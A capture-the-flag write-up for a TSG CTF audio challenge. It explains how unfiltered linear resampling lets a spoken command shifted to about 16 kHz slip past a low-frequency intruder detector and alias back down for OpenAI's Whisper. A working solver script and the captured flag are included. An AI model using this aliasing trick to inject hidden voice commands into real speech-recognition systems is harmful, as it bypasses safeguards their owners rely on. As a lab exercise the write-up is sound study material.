Mission Impossible TSG CTF Writeup: Bypassing Audio Security with Spectral Aliasing

Barely Tame CTF Player. Debugging Addict. Worshipper of Wi-Fi Signals. Human? Depends on the Ping.
Challenge Details
Category: Misc / Signal Processing / Audio
Description:
The security system of CIA vault room is state-of-the-art.
There are a large number of pressure-sensitive, temperature-sensitive and audio-sensitive sensors.
And the terminal is operated by voice recognition.
Files Provided:
❯ tree .
.
├── Dockerfile
└── src
└── server.py
Goal: Bypass a frequency-based security system to issue a voice command to a neural network.
Solution
1. Challenge Overview
We are presented with a "state-of-the-art" voice-controlled vault. The system listens for audio commands but has strict security measures:
Intruder Detector: It analyzes the audio spectrum. If it detects any sound energy in the human hearing range (0 Hz – 10,000 Hz), it triggers an alarm.
Voice Recognition: If the alarm isn't triggered, the audio is passed to OpenAI's Whisper model to check for the passphrase: "Give me the flag".
The Paradox: We need to send a voice command (which naturally exists between 85 Hz and 255 Hz) without creating any sound energy below 10,000 Hz.
2. Analyzing the Source Code (server.py)
There are two critical functions in the server code that reveal the vulnerability.
The Guard: detect_intruder
def detect_intruder(freq_space, sr):
# Zeroes out everything ABOVE 10,000 Hz
cut_high_freqs(freq_space, sr, 10000)
# Checks if anything remains BELOW 10,000 Hz
magnitude = np.abs(freq_space).max()
return magnitude > 0
This function acts as a Low-Pass Filter. It deletes high frequencies and checks the remaining low frequencies. If our audio has silence in the 0–10kHz range, we pass this check.
The Listener: recognize
# ... Intruder check passed ...
# Resample to 16,000 Hz for Whisper
wave = librosa.resample(wave, orig_sr=sr, target_sr=WHISPER_SR, res_type="linear")
result = whisper.transcribe(model, wave)["text"]
This is the flaw. The server uses librosa.resample with res_type="linear". Linear interpolation is fast, but it lacks a proper anti-aliasing filter.
If you feed a signal with frequencies higher than the Nyquist frequency (half the sample rate) into a resampler without filtering, those high frequencies "fold back" (alias) and appear as low frequencies.
3. The Vulnerability: Spectral Aliasing
Aliasing is a phenomenon where different signals become indistinguishable when sampled.
The target sample rate is 16,000 Hz.
This means the "Nyquist Limit" is 8,000 Hz.
Any frequency
fentered into this system will appear asfiff < 8000.However, if we input a frequency
fnear 16,000 Hz, the sampler essentially "misses" the cycles and interprets it as a low frequency.
The Math: If we sample a signal at F_s = 16000 Hz, a high-frequency input at F_in = 16000 - x Hz will look exactly like a low-frequency signal at x Hz.
The Plan:
Take the voice command ("Give me the flag"), which is at ~1 kHz.
Shift it up to ~15 kHz using Amplitude Modulation.
The Guard (Intruder Detector): Sees 15 kHz. It ignores everything above 10 kHz. It sees silence. PASS.
The Listener (Whisper): Resamples the 15 kHz signal at 16 kHz. Due to aliasing, the 15 kHz signal folds back down to 1 kHz. Whisper hears the voice clearly.
4. The Final Script
import numpy as np
import librosa
import scipy.signal
from scipy.io import wavfile
from gtts import gTTS
from gradio_client import Client, handle_file
import os
# Helper to remove high frequencies (clean input)
def butter_lowpass_filter(data, cutoff, fs, order=5):
nyq = 0.5 * fs
b, a = scipy.signal.butter(order, cutoff / nyq, btype='low', analog=False)
return scipy.signal.filtfilt(b, a, data)
# Helper to remove low frequencies (clean output)
def butter_highpass_filter(data, cutoff, fs, order=5):
nyq = 0.5 * fs
b, a = scipy.signal.butter(order, cutoff / nyq, btype='high', analog=False)
return scipy.signal.filtfilt(b, a, data)
def solve():
# 1. Generate Voice Command
print("[*] Generating TTS...")
tts = gTTS("give me the flag")
tts.save("base.mp3")
# 2. Preparation
# We use 48kHz to give us enough "room" to shift frequencies up
target_sr = 48000
y, sr = librosa.load("base.mp3", sr=target_sr)
y = y[:int(4.5 * target_sr)] # Trim duration
# 3. Clean the Source
# Filter out anything above 3kHz in the voice so it doesn't leak later
y_clean = butter_lowpass_filter(y, 3000, target_sr, order=6)
# 4. Modulation (The Magic Trick)
# Shift the 0-3kHz voice up to 13-19kHz range
t = np.arange(len(y_clean)) / target_sr
carrier = np.cos(2 * np.pi * 16000 * t)
y_mod = y_clean * carrier
# 5. Safety Firewall
# Delete anything below 11kHz to ensure we bypass the intruder detector
y_final = butter_highpass_filter(y_mod, 11000, target_sr, order=6)
# 6. Anti-Click Fading
# Smooth the start and end to prevent "pop" noises that trigger alarms
fade_len = int(0.1 * target_sr)
fade_in = np.linspace(0, 1, fade_len)
fade_out = np.linspace(1, 0, fade_len)
y_final[:fade_len] *= fade_in
y_final[-fade_len:] *= fade_out
# 7. Save and Send
y_int16 = (y_final / np.max(np.abs(y_final)) * 32767).astype(np.int16)
wavfile.write("payload.wav", target_sr, y_int16)
print("[*] Sending payload...")
client = Client("http://35.194.98.181:57860/")
result = client.predict(audio=handle_file("payload.wav"), api_name="/predict")
print(result)
if __name__ == "__main__":
solve()
Output:
❯ python3 solver2.py
[*] Generating base audio...
[*] Applying Low-pass filter (3kHz)...
[*] Modulating with 16kHz carrier...
[*] Applying High-pass filter (11kHz)...
[*] Payload saved to robust_solution.wav
[*] Sending payload to CIA Vault Terminal...
Loaded as API: http://35.194.98.181:57860/
[+] Server Response:
OK, here is the flag: TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}
Final Flag
TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}




